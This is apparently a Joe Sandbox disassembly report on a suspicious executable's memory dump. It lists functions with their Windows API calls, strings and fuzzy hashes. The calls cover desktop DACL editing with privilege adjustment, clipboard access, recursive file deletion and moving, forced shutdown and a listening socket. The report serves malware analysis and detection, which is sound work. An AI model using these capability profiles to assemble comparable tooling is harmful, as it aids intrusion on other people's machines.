Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z]
API String ID: 22674027-3859823317
Opcode ID: cfa20db2f9aa0c81c2ad5fbc50ee5cc67b406882830cf36ebc7e918e5d04dd3d
Instruction ID: fcdd763ae2acfa499678418ae0f127607029247847ce67abfbfdbfc937ca58c6
Opcode Fuzzy Hash: cfa20db2f9aa0c81c2ad5fbc50ee5cc67b406882830cf36ebc7e918e5d04dd3d
Instruction Fuzzy Hash: 4881AF71900609AFDF219FA8EC49FEE7FBAFF05700F148129F918A61A0D7318944EB64

Function 00570B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00571114
Part of subcall function 005710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571120
Part of subcall function 005710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 0057112F
Part of subcall function 005710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571136
Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0057114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00570BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00570C00
GetLengthSid.ADVAPI32(?), ref: 00570C17
GetAce.ADVAPI32(?,00000000,?), ref: 00570C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00570C6D
GetLengthSid.ADVAPI32(?), ref: 00570C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00570C8C
HeapAlloc.KERNEL32(00000000), ref: 00570C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00570CB4
CopySid.ADVAPI32(00000000), ref: 00570CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00570CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00570D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00570D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570D45
HeapFree.KERNEL32(00000000), ref: 00570D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570D55
HeapFree.KERNEL32(00000000), ref: 00570D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570D65
HeapFree.KERNEL32(00000000), ref: 00570D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00570D78
HeapFree.KERNEL32(00000000), ref: 00570D7F

Part of subcall function 00571193: GetProcessHeap.KERNEL32(00000008,00570BB1,?,00000000,?,00570BB1,?), ref: 005711A1
Part of subcall function 00571193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00570BB1,?), ref: 005711A8
Part of subcall function 00571193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00570BB1,?), ref: 005711B7

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 77b9a56704e2ddca1891660ce72c81f3d1bf958924dd6dd603c3fa942a30b92a
Instruction ID: beedb129fadc94d7be722a950c97dc8b2c039ac6c1c8008448bc0a75d78e36c9
Opcode Fuzzy Hash: 77b9a56704e2ddca1891660ce72c81f3d1bf958924dd6dd603c3fa942a30b92a
Instruction Fuzzy Hash: F4713C71A0020AEBDF10DFA5EC48FAEBFB8BF15310F148515E919A7291D771A905EB60

Function 0058EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(005ACC08), ref: 0058EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0058EB37
GetClipboardData.USER32(0000000D), ref: 0058EB43
CloseClipboard.USER32 ref: 0058EB4F
GlobalLock.KERNEL32(00000000), ref: 0058EB87
CloseClipboard.USER32 ref: 0058EB91
GlobalUnlock.KERNEL32(00000000), ref: 0058EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0058EBC9
GetClipboardData.USER32(00000001), ref: 0058EBD1
GlobalLock.KERNEL32(00000000), ref: 0058EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0058EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0058EC38
GetClipboardData.USER32(0000000F), ref: 0058EC44
GlobalLock.KERNEL32(00000000), ref: 0058EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0058EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0058EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0058ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0058ECF3
CountClipboardFormats.USER32 ref: 0058ED14
CloseClipboard.USER32 ref: 0058ED59

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 9f0b9efbb33bc0988138c330b50c787ea237afe7d4e7eb8efb686105dd8d5992
Instruction ID: 0a8b4eff1b4c06f5b63da2787e81935f4f73e1d3a40baabb761e3da65b3ec795
Opcode Fuzzy Hash: 9f0b9efbb33bc0988138c330b50c787ea237afe7d4e7eb8efb686105dd8d5992
Instruction Fuzzy Hash: 5661BF34204202AFD300EF24D89AF6ABFB4BF95714F14451DF896A72A2DB31DD49DB62

Function 0058698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 005869BE
FindClose.KERNEL32(00000000), ref: 00586A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00586A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00586A75

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00586AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00586ADF

Strings

%4d, xrefs: 00586BB1
%03d, xrefs: 00586DA2
%4d%02d%02d%02d%02d%02d, xrefs: 00586B6A
%02d, xrefs: 00586C00, 00586C0A, 00586C5A, 00586CAA, 00586CFA, 00586D4A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00586B32

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 941213a7484778ab32e6477e783abb961878883097c990a1b8d03eaa8b0e5402
Instruction ID: 6f7dfe815ac6d371e7caf7b60cfe1a6e556da292a00cf721f621d7a26a54f650
Opcode Fuzzy Hash: 941213a7484778ab32e6477e783abb961878883097c990a1b8d03eaa8b0e5402
Instruction Fuzzy Hash: ECD15F72508301AED314EBA4D895EAFBBECBF88704F04491DF985D7291EB34DA44CB62

Function 00589642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00589663
GetFileAttributesW.KERNEL32(?), ref: 005896A1
SetFileAttributesW.KERNEL32(?,?), ref: 005896BB
FindNextFileW.KERNEL32(00000000,?), ref: 005896D3
FindClose.KERNEL32(00000000), ref: 005896DE
FindFirstFileW.KERNEL32(*.*,?), ref: 005896FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0058974A
SetCurrentDirectoryW.KERNEL32(005D6B7C), ref: 00589768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00589772
FindClose.KERNEL32(00000000), ref: 0058977F
FindClose.KERNEL32(00000000), ref: 0058978F

Strings

*.*, xrefs: 005896F5

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 3e2b08dc0ec6f1249e52e93c13f7404d6bfc605f81c451f1b10f59454175141a
Instruction ID: e06b54ad8eba499b6b8a4fe478946e26cd636b6fb4b98312bde7f07f89520740
Opcode Fuzzy Hash: 3e2b08dc0ec6f1249e52e93c13f7404d6bfc605f81c451f1b10f59454175141a
Instruction Fuzzy Hash: C531A03654021A6ADF24AFB5DC49AEE7FACFF4A320F184156F915F21A0EB30DE448B54

Function 0058979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 005897BE
FindNextFileW.KERNEL32(00000000,?), ref: 00589819
FindClose.KERNEL32(00000000), ref: 00589824
FindFirstFileW.KERNEL32(*.*,?), ref: 00589840
SetCurrentDirectoryW.KERNEL32(?), ref: 00589890
SetCurrentDirectoryW.KERNEL32(005D6B7C), ref: 005898AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 005898B8
FindClose.KERNEL32(00000000), ref: 005898C5
FindClose.KERNEL32(00000000), ref: 005898D5

Part of subcall function 0057DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0057DB00

Strings

*.*, xrefs: 0058983B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: af2324613f000af4f34e0b339afbc49c4d921261e59c532d40635e96c8dd665d
Instruction ID: bd9c7d75efeca15d4609e96e3d13370477dbf0bc7207b4d0043f2a5b7b236691
Opcode Fuzzy Hash: af2324613f000af4f34e0b339afbc49c4d921261e59c532d40635e96c8dd665d
Instruction Fuzzy Hash: 5431B23150021A6AEF20BFA4EC48AEE7FACBF46324F184156E954B2190DB30DE498F60

Function 00588195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00588257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00588267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00588273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00588310
SetCurrentDirectoryW.KERNEL32(?), ref: 00588324
SetCurrentDirectoryW.KERNEL32(?), ref: 00588356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0058838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00588395

Strings

*.*, xrefs: 0058839B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: d6cc8b3e27ef4d0c61ede0a983e01e97532d2a048b51cb7c252edefd544a757f
Instruction ID: 7c475f708cf66aeafc0f9aa510feada81e8ccd3ae88b66f64402f6417c7d0f99
Opcode Fuzzy Hash: d6cc8b3e27ef4d0c61ede0a983e01e97532d2a048b51cb7c252edefd544a757f
Instruction Fuzzy Hash: 47619E755043069FD710EF64C8459AEBBE9FF89310F448C1EF98993251EB31E945CB92

Function 0057D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2

Part of subcall function 0057E199: GetFileAttributesW.KERNEL32(?,0057CF95), ref: 0057E19A

FindFirstFileW.KERNEL32(?,?), ref: 0057D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0057D1DD
MoveFileW.KERNEL32(?,?), ref: 0057D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0057D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0057D237

Part of subcall function 0057D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0057D21C,?,?), ref: 0057D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0057D253
FindClose.KERNEL32(00000000), ref: 0057D264

Strings

\*.*, xrefs: 0057D0CD, 0057D0D6, 0057D0EB

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 981ac46e5a791924acc255902c2526183e3029e099f4aaf21512f0d6a05bafef
Instruction ID: abb67afadee84401edae6accc36a28799cbe7b2ee976bf676f5319ac9f69929a
Opcode Fuzzy Hash: 981ac46e5a791924acc255902c2526183e3029e099f4aaf21512f0d6a05bafef
Instruction Fuzzy Hash: B1617F3180110EAADF05EBE0D9569EDBFB5BF95300F648065E40677192EB316F49EB60

Function 0058ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0058ED91
EmptyClipboard.USER32 ref: 0058ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0058EDAC
CloseClipboard.USER32 ref: 0058EEA3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 40d53d5340cc6b32305873e304a09ba6f718dcd2d885cd50c9533605a6c0aa24
Instruction ID: 2679c957e10afe80cde0d3453917f6397d87073afe060390bf164002e43e7b78
Opcode Fuzzy Hash: 40d53d5340cc6b32305873e304a09ba6f718dcd2d885cd50c9533605a6c0aa24
Instruction Fuzzy Hash: 8941CD35204611AFE320EF19D88AB19BFF5FF55318F14C499E8559B6A2C731EC46CB90

Function 0057E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 005716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0057170D
Part of subcall function 005716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0057173A
Part of subcall function 005716C3: GetLastError.KERNEL32 ref: 0057174A

ExitWindowsEx.USER32(?,00000000), ref: 0057E932

Strings

SeShutdownPrivilege, xrefs: 0057E902
@, xrefs: 0057E925
, xrefs: 0057E920
, xrefs: 0057E95C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: a99771954b857ff24358e4ebec0add295ba28f475951914c1b531091c3dc5599
Instruction ID: 3d8285020655f0a4da70bace973e2ded67ee0411d300582781ff7b42d04a9a9f
Opcode Fuzzy Hash: a99771954b857ff24358e4ebec0add295ba28f475951914c1b531091c3dc5599
Instruction Fuzzy Hash: 86012B33610311ABEB642678BC8BFBF7E5CB719740F148862FE07E21D1D6605C44A294

Function 00591204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00591276
WSAGetLastError.WSOCK32 ref: 00591283
bind.WSOCK32(00000000,?,00000010), ref: 005912BA
WSAGetLastError.WSOCK32 ref: 005912C5
closesocket.WSOCK32(00000000), ref: 005912F4
listen.WSOCK32(00000000,00000005), ref: 00591303
WSAGetLastError.WSOCK32 ref: 0059130D
closesocket.WSOCK32(00000000), ref: 0059133C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 93cef969da796da19ceebe48d052bfd0765d33f128b678d9899cb982a21ae9fa
Instruction ID: 56d52344c05c3da122d081dace615ef2e542fafc9548844fce2655244f72d4ef
Opcode Fuzzy Hash: 93cef969da796da19ceebe48d052bfd0765d33f128b678d9899cb982a21ae9fa
Instruction Fuzzy Hash: F34190356005129FDB10EF24C488B69BFE6BF86318F188588E8568F2D2C775EC85CBE1

Function 0054B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0054B9D4
_free.LIBCMT ref: 0054B9F8
_free.LIBCMT ref: 0054BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,005B3700), ref: 0054BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,005E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0054BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,005E1270,000000FF,?,0000003F,00000000,?), ref: 0054BC36
_free.LIBCMT ref: 0054BD4B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 87c5870180fdbc500c10aca4dc230557b95ed7eda79566e1e5f61138330b3f44
Instruction ID: 2d4d12c22c48b61d3cb1cb8e2e5b4d89f06f4ee6a5dea2ad1f8547dd8ab00426
Opcode Fuzzy Hash: 87c5870180fdbc500c10aca4dc230557b95ed7eda79566e1e5f61138330b3f44
Instruction Fuzzy Hash: 84C13471A04246ABEB249F3A8C85BEE7FB8FF91318F14459AE590DB251E730CE41D750

Function 0057D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2

Part of subcall function 0057E199: GetFileAttributesW.KERNEL32(?,0057CF95), ref: 0057E19A

FindFirstFileW.KERNEL32(?,?), ref: 0057D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0057D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0057D481
FindClose.KERNEL32(00000000), ref: 0057D498
FindClose.KERNEL32(00000000), ref: 0057D4A1

Strings

\*.*, xrefs: 0057D3F2

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: f34b22bfdf773d1acf36d8306eb9f5f24247ba4289ec5df2495814359a51ab57
Instruction ID: 4492faea13b5ff97c31ade59f6912fc78f2ee5c62d5d3948ae735cf9f7e6cddb
Opcode Fuzzy Hash: f34b22bfdf773d1acf36d8306eb9f5f24247ba4289ec5df2495814359a51ab57
Instruction Fuzzy Hash: 2D315E710083429BD701EF64D8599EFBFF8BEE2310F448E1DF4D552191EB60AA49E762

Function 0054E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0054E645

Strings

1#SNAN, xrefs: 0054F844
1#INF, xrefs: 0054F852
1#IND, xrefs: 0054F83D
1#QNAN, xrefs: 0054F84B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 2639705a19b7efbfbdc79290edc89de81fa9247dd7d632e2f70ab8793298c6b6
Instruction ID: d7c299d255602201832638ca2b45f1e9c501374821133afc9694ce96cd203bf3
Opcode Fuzzy Hash: 2639705a19b7efbfbdc79290edc89de81fa9247dd7d632e2f70ab8793298c6b6
Instruction Fuzzy Hash: 58C25A72E046298FDB25CE28DD457EABBB5FB84308F1445EAD44EE7241E774AE818F40

Function 0058648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 005864DC
CoInitialize.OLE32(00000000), ref: 00586639
CoCreateInstance.OLE32(005AFCF8,00000000,00000001,005AFB68,?), ref: 00586650
CoUninitialize.OLE32 ref: 005868D4

Strings

.lnk, xrefs: 005864BA, 00586524, 005865E0

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
